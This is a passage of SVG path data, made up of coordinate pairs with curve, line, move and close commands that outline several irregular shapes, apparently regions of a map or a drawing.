555.51407,276.30411 C 553.82865,272.48402 553.43015,272.19761 550.0974,272.41107 C 548.11883,272.5378 545.00599,272.2423 543.17998,271.7544 C 540.3246,270.99147 539.51488,271.21239 537.39434,273.33293 L 534.92873,275.79854 L 537.82881,278.97372 C 539.98571,281.33522 540.86917,281.78332 541.27631,280.72232 C 542.16657,278.40235 547.34204,279.13995 548.48713,281.75 C 549.03005,282.9875 550.21507,284 551.1205,284 C 552.02593,284 553.04451,284.7875 553.38401,285.75 C 553.72351,286.7125 554.2636,288.06281 554.5842,288.75068 C 554.96809,289.57433 554.62839,289.79463 553.5893,289.3959 C 552.7215,289.06289 552.24124,288.41868 552.52206,287.96431 C 552.80287,287.50995 552.52989,286.82749 551.91545,286.44774 C 550.85504,285.79238 546.12059,289.5484 547.05556,290.30328 C 551.08759,293.5587 557.48593,298 558.1438,298 C 558.61471,298 559,297.12236 559,296.04969 z M 615.87482,296.57736 C 616.51161,296.18381 616.81628,295.51176 616.55187,295.08393 C 615.97714,294.15399 621.06924,289.32881 622.5,289.4476 C 623.05,289.49326 624.07193,289.89362 624.77096,290.33728 C 625.63987,290.88877 626.52714,290.0931 627.57583,287.82197 C 629.71659,283.18577 633.21262,277.52753 635.4939,275.00674 C 636.78096,273.58455 637.05715,272.64921 636.32592,272.18895 C 635.72391,271.81003 635.04008,270.6 634.80629,269.5 C 634.56076,268.34475 633.77274,267.67092 632.94061,267.90465 C 630.6053,268.56062 617.97324,269.2369 612.51261,268.9983 C 610.93569,268.9294 610.82129,268.72848 611.95873,268.02551 C 612.82012,267.49314 614.16977,267.55568 615.34045,268.1822 C 616.71603,268.91839 618.34845,268.88119 620.89433,268.05564 C 622.87745,267.41258 626.05814,267.02449 627.96254,267.19322 C 631.05506,267.46722 631.6055,267.12598 633.11336,264 C 634.04191,262.075 635.97127,259.40906 637.40082,258.07569 C 639.47573,256.14037 640,254.71834 640,251.02569 C 640,248.48156 640.52937,245.87063 641.17637,245.22363 C 642.0782,244.3218 641.99285,243.63333 640.81068,242.27363 C 639.96255,241.29813 638.96999,239.2441 638.60499,237.7091 C 638.24,236.17411 637.55139,235.15922 637.07476,235.4538 C 636.59813,235.74837 634.92382,235.31955 633.35408,234.50085 C 631.78434,233.68216 629.88386,233.00955 629.13081,233.00616 C 627.60276,232.99929 617.8923,238.63218 611,243.52358 C 608.525,245.28006 605.2625,247.01439 603.75,247.37764 C 601.17431,247.99624 601,248.37775 601,253.39661 C 601,256.50622 600.47539,259.15684 599.75,259.71234 C 599.0625,260.23881 595.91379,261.22589 592.75286,261.90586 C 587.53229,263.02888 587.1003,263.31889 588.03804,265.07108 C 588.60582,266.13198 589.50453,267 590.03518,267 C 590.56583,267 590.8875,267.54205 590.75,268.20455 C 590.6125,268.86705 591.025,269.42955 591.66667,269.45455 C 592.30833,269.47955 593.17083,269.8375 593.58333,270.25 C 595.08232,271.74898 597.98994,270.94499 599.5211,268.60814 C 600.38307,267.29261 602.30115,265.98442 603.78351,265.70105 C 606.68849,265.14573 610,266.42717 610,268.10661 C 610,268.67655 609.26698,268.40983 608.37106,267.51392 C 607.47514,266.618 606.08834,266.13586 605.28927,266.44249 C 604.49021,266.74912 603.19823,267 602.41821,267 C 601.6382,267 601,267.48214 601,268.07143 C 601,268.66071 600.36219,269.78067 599.58263,270.56022 C 598.47174,271.67112 598.39971,272.59869 599.24951,274.85007 C 600.16402,277.27288 599.99454,278.19893 598.16687,280.76565 C 596.82215,282.65414 596,285.31008 596,287.7657 C 596,291.37612 596.20512,291.68345 598.34217,291.27492 C 599.63036,291.02867 601.32188,291.46473 602.10109,292.24395 C 602.88031,293.02317 604.07634,293.47455 604.75893,293.24702 C 605.53429,292.98857 606,293.8063 606,295.42621 C 606,297.87566 606.24111,297.99901 610.35851,297.65601 C 612.75569,297.45631 615.23803,296.97092 615.87482,296.57736 z M 585.10855,294.85599 C 587.52199,293.94795 587.69864,293.47422 587.47027,288.52254 C 587.33451,285.57894 586.98838,282.79021 586.70109,282.32537 C 585.60281,280.54832 588.89005,275.0657 591.43707,274.42644 C 594.63241,273.62446 594.62389,273.42543 591.25,270.05627 C 589.7375,268.54589 587.52225,266.11613 586.32723,264.65681 C 583.8653,261.6504 582.47064,261.83486 577,265.89044 C 575.075,267.31751 572.89234,268.34587 572.14965,268.17568 C 571.40695,268.00548 571.08587,268.32992 571.43612,268.89664 C 571.78638,269.46337 571.20096,270.79904 570.13519,271.86481 C 567.50418,274.49582 566.61511,277.63551 568.20932,278.66584 C 570.29222,280.01201 575.81885,279.69305 575.26865,278.25843 C 574.70904,276.79927 575.84631,276.36687 582.25,275.60407 C 586.033,275.15345 587,275.33973 587,276.51913 C 587,277.33361 586.55,278 586,278 C 585.45,278 585,277.65926 585,277.24279 C 585,276.82633 583.06234,276.6397 580.6941,276.82805 L 576.3882,277.17051 L 576.96454,281.33526 C 577.32566,283.94478 577.0293,286.54658 576.17093,288.30266 C 575.0684,290.55821 575.03846,291.67864 576.01753,294.04233 C 577.30477,297.15 578.68343,297.27339 585.10855,294.85599 z M 944,292.34099 C 944,292.09622 942.65,291.42535 941,290.85016 C 939.14833,290.20466 938,289.10755 938,287.98396 C 938,285.08744 936.90265,283 935.37998,283 C 934.28922,283 934.03292,281.54331 934.23697,276.50378 C 934.49009,270.25227 935.17601,268.60246 936.42126,271.25 C 936.74463,271.9375 936.84884,271.28505 936.65285,269.8001 C 936.20861,266.43432 938.85461,265.08069 940.76667,267.69557 C 942.66371,270.28994 944.31828,269.9467 945.74426,266.66296 C 946.89045,264.02351 947.34361,263.82594 951.49426,264.15606 C 955.79197,264.49787 956,264.39205 956,261.86419 C 956,260.40658 955.325,258.95496 954.5,258.63837 C 953.675,258.32179 953,256.97875 953,255.65383 C 953,252.32451 950.39996,250.26913 948.04713,251.73849 C 946.8895,252.46145 945.91356,252.51356 945.28595,251.88595 C 944.65833,251.25833 943.8628,251.46039 943.03517,252.45762 C 940.78617,255.1675 939.79026,254.2009 940.50042,249.99749 C 941.05284,246.72775 940.90992,246.09734 939.71974,246.55405 C 938.7902,246.91075 938.05579,246.32134 937.69083,244.92572 C 937.16197,242.90338 936.99576,242.86139 935.48798,244.36917 C 934.59102,245.26612 932.98929,246 931.92857,246 C 930.78765,246 929.96875,246.71472 929.92349,247.75 C 929.88141,248.7125 929.69623,250.2875 929.51197,251.25 C 929.32772,252.2125 929.5354,253 929.97347,253 C 931.41805,253 933.98933,257.86423 933.38173,259.4476 C 932.45569,261.86084 931.22494,261.27412 931.72508,258.65783 C 931.99771,257.23166 931.45461,255.59747 930.33641,254.47926 C 929.32638,253.46924 928.5,252.31071 928.5,251.90476 C 928.5,251.49881 928.18592,250.85259 927.80205,250.46871 C 926.83551,249.50218 929.92866,245 931.55925,245 C 932.29032,245 934.11153,243.94797 935.60639,242.66215 C 938.28505,240.35806 938.29669,240.29625 936.41215,238.38177 C 935.36047,237.31337 933.84615,235.18681 933.04701,233.65607 C 932.11171,231.86452 930.9983,231.02869 929.92201,231.31014 C 927.57039,231.92511 927.70874,227.68975 930.125,225.0962 C 932.33612,222.72285 932.47438,220.21012 930.53473,217.64986 C 928.97168,215.5867 926.54783,216.37928 927.42553,218.66654 C 927.82271,219.70156 927.47628,219.9775 926.24371,219.60786 C 923.6838,218.84016 920.68784,221.8521 918.63577,227.25639 C 917.64243,229.87241 916.41484,231.75639 915.90779,231.44301 C 914.98378,230.87194 914.04419,232.49319 913.61859,235.39296 C 913.49354,236.245 913.0782,237.25514 912.69561,237.63772 C 911.36629,238.96705 912.01438,241.10529 914.5,243.59091 C 915.875,244.96591 917.03443,246.40795 917.07651,246.79545 C 917.11859,247.18295 917.38061,248.4 917.65877,249.5 C 917.93694,250.6 918.24001,252.80678 918.33226,254.40396 C 918.51358,257.54299 921.67414,259.01274 922.66884,256.42059 C 922.96867,255.63927 923.84083,255 924.60699,255 C 925.37314,255 926,254.22487 926,253.27749 C 926,251.93367 926.37928,252.09648 927.72522,254.01808 C 928.67409,255.37279 929.58775,257.38094 929.75558,258.48065 C 929.92341,259.58036 931.21495,262.14567 932.62567,264.18134 C 934.25578,266.53359 934.88692,268.35954 934.35736,269.19128 C 933.89907,269.91108 933.47783,272.075 933.42127,274 C 933.36472,275.925 933.00556,278.87362 932.62315,280.55248 C 932.06739,282.99239 932.43655,284.19647 934.46271,286.55248 C 935.85687,288.17362 936.99811,289.8375 936.99878,290.25 C 936.99945,290.6625 937.68912,291 938.53138,291 C 939.37365,291 940.31089,291.64659 940.61414,292.43686 C 941.0887,293.67353 944,293.5911 944,292.34099 z M 871.42857,291.42857 C 872.29286,290.56429 873,289.47575 873,289.00961 C 873,287.29572 869.46951,282.02369 868.52758,282.33101 C 866.96859,282.83966 866.26654,287.26349 867.27086,290.25 C 868.32944,293.39785 869.20975,293.64739 871.42857,291.42857 z M 590.98635,287.75 C 590.97016,282.7136 590.09574,279 588.92602,279 C 588.46363,279 588.16573,281.925 588.26403,285.5 C 588.38825,290.01775 588.83269,292 589.72138,292 C 590.56111,292 590.99531,290.54119 590.98635,287.75 z M 595,287 C 595,284.25 595.37777,282 595.83948,282 C 597.55585,282 598.97749,277.07098 598.00151,274.50396 C 596.9299,271.68542 595.49865,271.25817 594.63837,273.5 C 594.32179,274.325 593.46365,275 592.73138,275 C 590.03997,275 589.14093,277.04383 590.6012,279.84264 C 591.36376,281.30419 591.99045,284.6375 591.99384,287.25 C 591.99845,290.80282 592.37806,292 593.5,292 C 594.63333,292 595,290.77778 595,287 z M 548.0766,283.71567 C 547.53928,281.08486 546.92696,280.48165 544.70992,280.39909 C 543.21946,280.34358 541.94257,280.56858 541.87238,280.89909 C 541.18271,284.14641 541.58623,286.25212 543.23793,288.02501 C 545.0453,289.96499 545.33742,290.00461 546.96616,288.53063 C 548.28562,287.33653 548.56696,286.11661 548.0766,283.71567 z M 643.32939,287.33728 C 643.69389,286.97278 645.42799,286.51736 647.18295,286.32523 C 648.93791,286.13311 651.20721,285.08134 652.22585,283.98796 C 653.24448,282.89458 654.92038,282 655.95006,282 C 656.97974,282 658.95816,280.65 660.34655,279 C 661.73493,277.35 663.57493,276 664.43544,276 C 666.47235,276 666.40912,275.38329 664.02955,272.04149 C 662.94579,270.51951 662.35739,268.97594 662.72198,268.61135 C 663.08657,268.24676 663.52275,267.04503 663.69126,265.94085 C 664.13397,263.03989 666.99982,259 668.61501,259 C 669.64946,259 670,257.39426 670,252.65568 L 670,246.31136 L 656.40676,239.61789 C 641.3253,232.1916 638.37352,231.7921 639.55085,237.33657 C 639.92031,239.07646 640.92687,241.29813 641.78767,242.27363 C 642.98748,243.63333 643.0782,244.3218 642.17637,245.22363 C 641.52937,245.87063 641,248.47581 641,251.01291 C 641,254.80458 640.48031,256.12371 638.08091,258.42249 C 633.85246,262.4736 633.27419,265.81852 636.35352,268.41435 C 639.008,270.65205 641.25835,275.89574 638.95263,274.47072 C 637.48156,273.56156 638.41585,275.46557 640.80709,278.25 C 642.19357,279.86445 642.0656,280 639.15499,280 C 635.60621,280 635.02533,281.408 637.93228,282.96375 C 638.99503,283.53252 640.15035,284.89835 640.49966,285.99894 C 641.14884,288.04431 642.14922,288.51744 643.32939,287.33728 z M 860,283.78018 C 860,283.1742 861.29303,281.51326 862.87341,280.0892 C 865.9073,277.35538 866.82615,273.98572 867.26067,264 C 867.43977,259.88415 867.87749,258.5 869,258.5 C 869.825,258.5 870.95,258.01551 871.5,257.42335 C 872.05,256.83119 874.525,254.80887 877,252.92931 C 879.475,251.04974 882.32016,248.49673 883.32258,247.25596 C 884.325,246.01518 885.71775,245 886.41759,245 C 887.77633,245 891.83974,240.99688 891,240.48558 C 890.46503,240.15985 894.83269,236.49776 896.5,235.87407 C 897.05,235.66833 897.38229,235.14688 897.23843,234.71528 C 897.09456,234.28369 896.85654,233.15869 896.7095,232.21528 C 896.56245,231.27188 896.1162,229.97811 895.71783,229.34024 C 895.31945,228.70238 895.21524,227.57738 895.48625,226.84024 C 896.28124,224.6779 894.69399,223.15057 890.97421,222.49855 C 889.06339,222.16361 886.19336,221.23941 884.59636,220.44478 C 882.99936,219.65015 880.48686,219 879.01303,219 C 877.5392,219 875.99583,218.6625 875.58333,218.25 C 875.17083,217.8375 874.53333,217.48114 874.16667,217.45808 C 873.8,217.43503 872.0375,216.63597 870.25,215.6824 C 866.61962,213.74572 866.13831,211.89693 868.75,209.92067 C 870.23877,208.79412 870.31341,208.8057 869.25,209.99823 C 867.32553,212.15636 867.74478,213.55587 870.75,215.00541 C 874.23275,216.68528 875.61556,217.07804 880.25,217.70376 C 882.3125,217.98223 884,218.57705 884,219.02558 C 884,219.84477 889.41414,221.44663 891.75,221.31854 C 894.49423,221.16806 894.81319,220.93358 894.56367,219.25 C 894.42102,218.2875 893.67334,217.47531 892.90215,217.44512 C 888.70286,217.28078 884.06791,215.71192 881.94867,213.73756 C 880.62772,212.5069 879.53638,211.65411 879.52347,211.84247 C 879.4633,212.72046 874,209.55237 874,208.63948 C 874,207.94139 873.64738,207.95262 872.92634,208.67366 C 872.16146,209.43854 870.73737,209.20847 867.97464,207.87366 C 865.84173,206.84315 863.62487,206 863.04831,206 C 862.47174,206 862,205.3618 862,204.58179 C 862,203.80177 861.72686,202.45177 861.39301,201.58179 C 861.05339,200.69675 861.29963,200 861.95203,200 C 862.59455,200 862.8012,200.56119 862.41231,201.25 C 861.87734,202.19756 862.00646,202.22353 862.94594,201.35736 C 863.89123,200.48583 863.91506,199.70981 863.0464,198.08669 C 862.42001,196.91628 862.17988,195.51797 862.51277,194.97933 C 862.84567,194.4407 862.57859,194 861.91926,194 C 861.25993,194 860.10805,193.2125 859.35951,192.25 C 858.11328,190.64755 857.91583,190.63728 857.01772,192.12824 C 856.26802,193.3728 854.85085,193.67337 851.00353,193.40379 C 846.06086,193.05747 845.97865,193.09796 846.44159,195.65095 C 846.70089,197.08086 847.8326,198.89488 848.95652,199.6821 C 851.38369,201.38215 851.61992,203 849.44098,203 C 848.58352,203 848.14781,203.43015 848.47273,203.95588 C 849.5978,205.77628 838.94893,217.03527 835.78284,217.37283 C 831.76285,217.80143 830.87429,218.79401 832.27048,221.29636 C 832.94672,222.50836 833.80182,223.72951 834.17072,224.01002 C 834.53961,224.29053 835.15089,225.75303 835.52912,227.26002 C 836.19392,229.90878 836.08201,230 832.16743,230 C 829.94026,230 827.87143,230.39901 827.57003,230.88669 C 826.66254,232.35504 829.7577,234.21168 831.95201,233.51523 C 834.56311,232.6865 834.54831,233.41126 831.90382,235.87497 L 829.80765,237.82786 L 832.35486,239.49686 C 835.43026,241.51194 839,240.67164 839,237.93261 C 839,236.72959 839.68784,236 840.82203,236 C 842.31405,236 842.61626,236.74431 842.49058,240.10944 C 842.3629,243.52805 843.43844,252.60094 844.43359,256.5 C 844.57396,257.05 845.65883,259.67481 846.84441,262.33291 C 848.02998,264.991 849,267.63789 849,268.21487 C 849,268.79185 849.84869,270.66705 850.88598,272.38197 C 851.92327,274.09688 853.10731,276.625 853.51717,278 C 855.16935,283.54261 860,287.84969 860,283.78018 z M 957.5,279.7 C 957.5,279.04 959.65899,277.81678 962.29776,276.98173 C 968.12492,275.13771 968.96501,273.94003 968.98469,267.44841 C 968.99888,262.76597 968.65289,262.03969 964.25,257.50974 C 961.6375,254.82185 959.5,252.33792 959.5,251.9899 C 959.5,251.64188 958.73162,250.58876 957.79249,249.64963 C 955.98346,247.8406 956.39325,245.07676 958.67459,243.70031 C 959.40356,243.26048 960,242.24798 960,241.45031 C 960,240.65264 960.7875,239.98632 961.75,239.96959 C 963.41667,239.94063 963.41667,239.89065 961.75,238.9199 C 960.7875,238.3593 960,237.30046 960,236.56694 C 960,235.83342 959.2125,234.95549 958.25,234.61599 C 957.2875,234.27649 955.87486,233.71562 955.1108,233.36962 C 954.2987,233.00187 953.98476,233.16632 954.35506,233.76548 C 955.20188,235.13566 953.09977,235.84886 949.19405,235.51651 C 947.43732,235.36703 946,235.63966 946,236.12236 C 946,236.60506 945.36713,237 944.59362,237 C 943.6474,237 943.37097,237.7026 943.74878,239.14735 C 944.24973,241.06297 944.01475,241.22052 941.57138,240.60727 C 939.77723,240.15697 939.05416,240.27861 939.47523,240.95992 C 939.82877,241.53196 939.52898,242.03553 938.80902,242.07895 C 937.87634,242.1352 937.84323,242.29752 938.69382,242.64356 C 939.35043,242.91067 939.63272,243.79354 939.32114,244.6055 C 938.96982,245.52102 939.27605,245.97129 940.12732,245.79089 C 941.11403,245.58179 941.46767,246.55736 941.38502,249.26039 C 941.29027,252.35904 941.51397,252.81833 942.65621,251.87036 C 943.4186,251.23763 945.68162,250.57285 947.68515,250.39307 C 951.72803,250.03029 953.91369,251.89378 953.9682,255.75 C 953.98684,257.0692 954.62053,258 955.5,258 C 956.55728,258 957,259.06916 957,261.62244 C 957,264.60751 957.24541,265.04122 958.39474,264.08736 C 959.16185,263.45072 960.37262,263.05812 961.08535,263.21491 C 963.45143,263.73544 963.10838,260.43631 960.48557,257.44677 C 959.06366,255.82605 957.17335,253.30085 956.28487,251.83521 C 955.39639,250.36958 953.51083,248.64252 952.09472,247.9973 C 949.65481,246.8856 949.61634,246.75371 951.36013,245.47862 C 953.28271,244.07279 952.67551,241.5268 950.60696,242.32058 C 949.95205,242.57189 948.76007,242.26507 947.95811,241.63876 C 946.25627,240.30965 945.31142,236.4564 946.93312,237.45866 C 947.5199,237.82132 948,238.76648 948,239.55902 C 948,240.39598 948.96409,241 950.3,241 C 952.8447,241 955,242.69672 955,244.7 C 955,245.415 954.27741,246 953.39424,246 C 952.20877,246 952.53594,246.75506 954.64424,248.88482 C 960.41329,254.71258 964.15081,259 963.46208,259 C 963.07325,259 963.23447,259.57759 963.82035,260.28354 C 964.48565,261.08517 964.54352,262.11767 963.9745,263.03354 C 963.4734,263.84009 963.31989,266.11395 963.63338,268.08656 C 964.15394,271.36225 963.94033,271.78208 961.16892,272.93003 C 959.23255,273.7321 958.32981,274.69591 958.67424,275.59346 C 959.02463,276.50657 958.5282,277 957.25917,277 C 955.75381,277 955.28385,277.72126 955.21517,280.13701 C 955.14634,282.55784 955.39697,283.00303 956.31299,282.08701 C 956.96584,281.43416 957.5,280.36 957.5,279.7 z M 563.76015,276.64824 C 564.34812,276.28485 565.05709,276.55284 565.33564,277.24377 C 565.64118,278.00163 565.87342,277.80575 565.92105,276.75 C 565.96447,275.7875 566.94667,274.05333 568.1037,272.8963 C 569.26074,271.73926 570.31614,270.05176 570.44903,269.1463 C 570.58193,268.24083 571.32276,267.5 572.09533,267.5 C 572.8679,267.5 574.32694,266.67306 575.33765,265.66235 C 577.8623,263.1377 583.77346,260.79332 585.90707,261.4705 C 586.87521,261.77778 590.32968,261.42638 593.58366,260.68961 L 599.5,259.35003 L 599.79682,253.77832 C 600.05511,248.92996 599.86037,248.22566 598.29682,248.35331 C 597.13512,248.44815 596.59698,247.91141 596.77436,246.83481 C 596.9614,245.69962 596.10054,244.96136 594.06969,244.51531 C 592.43122,244.15544 590.83419,243.10478 590.52073,242.1805 C 589.59426,239.44867 570.02923,228 566.28719,228 C 564.13885,228 563.21011,228.41716 563.50427,229.25 C 563.7471,229.9375 564.63339,236.20177 565.47381,243.1706 C 566.31422,250.13944 567.2217,256.43944 567.49041,257.1706 C 568.56402,260.09183 566.42697,260.87418 556.84601,261.06743 C 551.55824,261.17408 546.72971,260.95098 546.11594,260.57166 C 545.50217,260.19233 544.94257,260.47102 544.87238,261.19098 C 544.80218,261.91094 544.63863,263.5125 544.50891,264.75 C 544.3792,265.9875 544.5894,267 544.97602,267 C 545.36264,267 546.15872,268.05293 546.74507,269.33984 C 547.77789,271.60663 550.27142,272.18635 552.65427,270.71367 C 553.9658,269.90311 555.48415,271.51302 556.88626,275.20085 C 557.63706,277.17561 558.49014,277.77008 560.28966,277.57255 C 561.61046,277.42756 563.17218,277.01162 563.76015,276.64824 z M 954.75,276.36971 C 955.9875,276.03808 957,275.19882 957,274.50469 C 957,273.81056 958.35,272.68345 960,272 C 963.32309,270.62353 963.81226,268.39114 961.43718,265.44113 C 960.35144,264.09256 959.71783,263.87449 959.36159,264.72677 C 958.99685,265.59939 957.17002,265.77807 953.0334,265.3457 C 947.81054,264.79981 947.15332,264.94156 946.58352,266.73685 C 946.23457,267.83629 946.48319,270.03277 947.13601,271.61792 C 947.78884,273.20306 948.25569,274.82131 948.17348,275.21401 C 948.09126,275.60672 948.69359,275.67107 949.512,275.35702 C 950.3304,275.04297 951,275.28417 951,275.89301 C 951,277.14933 951.57033,277.22183 954.75,276.36971 z M 737,272.3697 C 738.2908,271.31826 738.22106,271.1724 736.5,271.32392 C 734.25753,271.52135 733.03812,272.79023 733.01531,274.95 C 733.00219,276.19222 733.17912,276.19878 734.25,274.99578 C 734.9375,274.22346 736.175,273.04172 737,272.3697 z M 536.22504,271.87211 C 535.82627,271.49922 534.6,270.94197 533.5,270.63378 C 532.4,270.32559 534.54271,270.23051 538.26158,270.42249 C 545.27288,270.78445 547.03198,270.10136 544.5,268 C 543.68711,267.32536 543.2581,266.39141 543.54663,265.92455 C 543.83517,265.45768 542.30788,263.25867 540.15264,261.03785 C 537.04739,257.8381 535.50848,257 532.73834,257 C 529.79049,257 529.04624,257.47416 527.98943,260.02552 C 526.90184,262.6512 526.97658,263.31664 528.55501,265.06079 C 529.55535,266.16615 531.00046,266.83007 531.76637,266.53616 C 533.70276,265.79309 538.10753,267.01699 537.4318,268.11034 C 537.1269,268.60369 535.8126,268.74009 534.51115,268.41344 C 533.2097,268.0868 531.32478,268.29646 530.32244,268.87936 C 529.24298,269.50711 529.03367,269.95158 529.80902,269.96959 C 530.52898,269.98632 530.83303,270.46115 530.48469,271.02478 C 530.13635,271.5884 530.22229,271.98511 530.67567,271.90636 C 532.96969,271.50785 534.15988,272.14098 533.64399,273.48537 C 533.16925,274.72251 533.39787,274.76847 535.01204,273.76041 C 536.07796,273.09473 536.62381,272.24499 536.22504,271.87211 z M 637.5,270 C 636.70806,268.71862 636,268.71862 636,270 C 636,270.55 636.47656,271 637.05902,271 C 637.64148,271 637.83992,270.55 637.5,270 z M 736.66664,263.27548 C 735.89056,261.74897 735.56462,259.64646 735.94235,258.60324 C 736.43314,257.24779 735.68457,255.67817 733.31934,253.10324 C 731.49896,251.12146 730.00741,249.03125 730.00478,248.45834 C 730.00215,247.88542 728.425,245.74688 726.5,243.70602 C 724.575,241.66516 722.94809,239.4339 722.88465,238.74768 C 722.43026,233.83282 720.86575,230.19816 718.99387,229.70865 C 717.98367,229.44447 716.17917,227.31137 714.98388,224.96841 C 712.14822,219.41005 708.47377,215.4244 707.55524,216.91062 C 707.17385,217.52772 706.4429,217.77373 705.9309,217.45729 C 705.41891,217.14086 705,217.37348 705,217.97423 C 705,219.51933 709.76383,228.73601 710.93731,229.46126 C 711.47375,229.79279 711.6724,230.69013 711.37877,231.45533 C 711.07836,232.23818 711.77437,233.34406 712.97031,233.98411 C 715.58242,235.38207 717.34867,239.48739 717.08239,243.5419 C 716.94809,245.58686 717.5998,247.22554 719.0709,248.5419 C 720.27445,249.61885 722.08687,252.41716 723.09849,254.76036 C 724.11012,257.10357 725.2893,258.96278 725.71891,258.89194 C 726.14851,258.82111 727.175,258.82334 728,258.89689 C 729.31417,259.01406 729.31765,259.14595 728.02803,259.96152 C 726.77935,260.75119 726.83383,260.999 728.38712,261.59506 C 731.45579,262.77262 735.51914,267.11478 735.18269,268.85693 C 734.96427,269.98793 735.36595,269.80672 736.47155,268.27548 C 737.88085,266.32361 737.90476,265.71078 736.66664,263.27548 z M 745.65737,267.97033 C 747.77081,267.29597 750.53367,266.35177 751.79705,265.87211 C 753.06043,265.39245 754.97293,265 756.04705,265 C 757.12117,265 758,264.64906 758,264.22014 C 758,263.79122 760.26764,262.56031 763.0392,261.48479 C 765.81076,260.40927 768.74679,258.5092 769.56372,257.26241 C 770.88209,255.25032 770.87415,254.6573 769.49307,251.9866 C 768.18555,249.45814 767.50301,249.06932 765.21855,249.55159 C 763.72335,249.86723 761.375,250.3515 760,250.62773 C 758.625,250.90397 755.42411,253.16063 752.88691,255.64254 C 748.93818,259.50523 748.20349,259.88616 747.78546,258.2876 C 747.51399,257.24951 745.4332,255.68792 743.1004,254.77157 L 738.90371,253.12307 L 737.84562,255.81153 C 737.11331,257.67226 737.10319,259.7214 737.81278,262.46707 C 738.41837,264.81037 738.47856,267.1058 737.95982,268.07508 C 737.2485,269.40419 737.53133,269.66665 739.44817,269.45623 C 740.74978,269.31335 743.54392,268.6447 745.65737,267.97033 z M 732.35446,265.39025 C 731.33451,264.5746 729.29331,263.44484 727.81847,262.87967 C 726.04625,262.20054 724.53374,260.3937 723.35814,257.55138 C 721.70893,253.56396 721.39064,253.31646 718.98867,254.15379 C 715.78123,255.27191 713.19504,262.75388 715.68564,263.70961 C 716.48248,264.01539 717.57039,263.82961 718.10322,263.29678 C 719.85358,261.54642 727.95961,263.50506 730.82535,266.37081 C 732.29016,267.83561 733.6507,268.5479 733.84878,267.95367 C 734.04685,267.35944 733.37441,266.2059 732.35446,265.39025 z M 932.86763,265.75266 C 932.02996,264.18746 931.52699,263.91903 931.21056,264.86832 C 930.96068,265.61796 931.37358,266.62237 932.12812,267.10034 C 934.1265,268.36624 934.19731,268.2372 932.86763,265.75266 z M 544.40484,260.38738 C 544.87144,259.17144 545.35087,259.04631 546.35384,259.8787 C 547.08544,260.48587 547.9638,260.70287 548.30575,260.36091 C 548.64771,260.01896 552.8813,259.68536 557.71374,259.61959 C 565.87413,259.50852 566.48393,259.35753 566.27439,257.5 C 565.07837,246.89745 562.81826,230.14695 562.3952,228.75 C 561.97831,227.3734 562.46352,227 564.66926,227 C 567.28548,227 567.12517,226.76555 562.2761,223.5 C 556.21083,219.41541 556,219.36502 556,222 C 556,223.77778 555.33333,224 550,224 L 544,224 L 544,228.38337 C 544,231.99171 543.62966,232.86358 541.90542,233.31448 C 540.14745,233.7742 539.91915,234.35542 540.48487,236.93111 L 541.15891,240 L 534.00803,240 C 527.6319,240 527.02068,240.16354 528.36654,241.50939 C 529.45863,242.60149 529.81228,244.81324 529.64568,249.50939 L 529.41543,256 L 533.02062,256 C 535.72102,256 537.34715,256.75291 539.5,259 C 542.78543,262.42925 543.53946,262.64254 544.40484,260.38738 z M 764.57494,248.64594 C 774.58425,246.57284 779.19593,244.17382 780.15666,240.54024 C 781.06844,237.09178 780.31227,236.3975 774.59196,235.43106 C 771.93159,234.9816 769.58415,233.64116 767.39803,231.3232 C 763.72428,227.4279 761,223.51808 761,222.14094 C 761,220.60729 755.69921,215.55567 752.70295,214.23389 C 751.16457,213.55525 748.41275,213 746.58781,213 C 744.74436,213 742.09782,212.07818 740.63283,210.92582 C 739.18253,209.78502 735.43582,207.31002 732.3068,205.42582 C 729.17777,203.54162 727.11598,202 727.72505,202 C 728.33412,202 732.19648,204.25 736.30807,207 C 744.026,212.16207 749.2268,213.45731 750.36163,210.5 C 750.67821,209.675 751.86719,209 753.0038,209 C 754.78878,209 754.91827,208.71581 753.95416,206.91435 C 753.34025,205.76725 753.06245,204.60422 753.33683,204.32984 C 754.19702,203.46964 750.63715,200 748.89439,200 C 747.42518,200 746.53266,198.4935 745.485,194.24522 C 745.31481,193.55509 746.13619,192.31759 747.31029,191.49522 C 748.80479,190.44843 748.99521,190 747.94519,190 C 747.12029,190 745.28515,188.67779 743.86711,187.06177 C 741.74578,184.64425 740.64847,184.18305 737.6754,184.45937 C 734.22794,184.77977 730.8099,186.98249 731.10056,188.69643 C 731.67852,192.10439 728.59898,195.60913 723.52116,197.32231 C 722.9828,197.50395 723.36698,198.91114 724.37489,200.4494 C 725.3828,201.98767 725.79352,202.99042 725.2876,202.67775 C 724.78168,202.36507 722.72185,202.67508 720.71019,203.36666 C 717.36308,204.51734 717.18794,204.75937 718.64673,206.21816 C 720.10552,207.67695 719.90443,208.03487 716.27753,210.43503 C 713.92039,211.99492 711.64268,212.80012 710.65712,212.42192 C 708.0725,211.43011 708.66196,213.75597 712.29031,218.86602 C 714.09997,221.41471 716.20101,224.7375 716.95929,226.25 C 717.71756,227.7625 718.90396,229 719.59574,229 C 721.17957,229 724,234.54166 724,237.65364 C 724,239.9488 727.12255,244 728.89159,244 C 729.38197,244 730.05684,245.09032 730.3913,246.42293 C 730.72576,247.75554 732.1768,250.24509 733.61582,251.95527 C 735.96671,254.74915 736.35507,254.89667 737.44293,253.40894 C 738.56201,251.87851 738.99754,251.90532 743.19777,253.76328 C 745.69704,254.86883 748.07755,256.31646 748.48778,256.98023 C 749.00305,257.81396 750.51155,256.93866 753.36683,254.14919 C 756.83222,250.76367 758.64307,249.87453 764.57494,248.64594 z M 777.58179,254 C 779.06464,254 780,253.4198 780,252.5 C 780,251.675 780.65182,251 781.44848,251 C 783.1163,251 788,246.74804 788,245.29596 C 788,244.75988 789.80432,242.65185 792.00959,240.61145 C 795.97554,236.94202 796.00003,236.87531 794.25959,234.48225 C 793.29182,233.15158 791.65312,232.04871 790.61803,232.03142 C 789.58295,232.01414 787.2205,231.06333 785.36815,229.91851 C 782.94718,228.42227 782.15694,228.24541 782.55759,229.28947 C 782.86413,230.08831 782.41408,231.01086 781.55747,231.33957 C 779.81546,232.00805 779.47731,235.07731 780.98011,236.58011 C 782.59741,238.19741 780.27138,244.77909 777.80598,245.56158 C 776.63351,245.93371 774.16558,246.86852 772.32169,247.63895 L 768.96918,249.03972 L 770.55218,252.10091 C 771.60328,254.13351 772.64397,254.96686 773.64938,254.58105 C 774.48219,254.26147 776.25177,254 777.58179,254 z M 973.03647,247.96353 C 975.75062,245.24938 974.72494,243.85132 970.9779,245.15755 C 968.15419,246.1419 967.19972,247.86638 968.66667,249.33333 C 969.78114,250.44781 970.90425,250.09575 973.03647,247.96353 z M 